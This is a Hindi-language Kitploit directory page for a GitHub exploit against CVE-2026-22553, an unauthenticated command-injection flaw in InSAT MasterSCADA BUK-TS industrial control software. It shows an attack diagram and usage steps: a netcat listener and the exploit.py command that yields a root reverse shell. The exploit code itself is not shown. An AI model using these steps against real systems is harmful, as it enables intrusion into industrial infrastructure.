Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
पेलोड जनरेशनशोषणSCADA/ICS सुरक्षावेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - बिना प्रमाणीकरण के RCE

CVE-2026-22553 | CVSS 9.8 गंभीर| एक्सप्लॉइट लेखक Mohammed Idrees Banyamer


📝 विवरण

InSAT MasterSCADA BUK-TS का MMadmServ वेब इंटरफ़ेस बिना प्रमाणीकरण के OS कमांड इंजेक्शन भेद्यता से ग्रस्त है। यह दोष दूरस्थ हमलावरों को बिना किसी प्रमाणीकरण के पूर्ण रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देता है।

  • प्रभावित उत्पाद: InSAT MasterSCADA BUK-TS (सभी संस्करण)
  • भेद्यता प्रकार: OS कमांड इंजेक्शन (CWE-78)
  • गंभीरता: गंभीर (CVSS v3.1 स्कोर: 9.8)
  • एक्सप्लॉइट लेखक: Mohammed Idrees Banyamer
  • देश: जॉर्डन 🇯🇴

🛠️ हमला विधि आरेख

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 उपयोग

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

उदाहरण

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

विकल्प

विकल्पविवरण
targetलक्ष्य URL (जैसे http://ip:port)
--lhostआपका IP पता (रिवर्स शेल)
--lportआपका लिसनिंग पोर्ट

📌 उपयोग कैसे करें

  1. अपनी मशीन पर एक लिसनर शुरू करें:

    root@kitploit:~
    nc -lvnp 4444
    
  2. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. रूट/सिस्टम विशेषाधिकारों के साथ एक रिवर्स शेल प्राप्त करें।


⚠️ अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
जिन सिस्टम के आप स्वामी नहीं हैं, उनके विरुद्ध अनधिकृत उपयोग अवैध है और अंतर्राष्ट्रीय कानूनों का उल्लंघन हो सकता है।
लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।


📬 लेखक

Mohammed Idrees Banyamer

  • Instagram: @banyamer_security
  • GitHub: mbanyamer
  • देश: जॉर्डन 🇯🇴

यदि आपको यह रिपॉज़िटरी उपयोगी लगी तो इसे स्टार ⭐ दें!

टूल डाउनलोड करें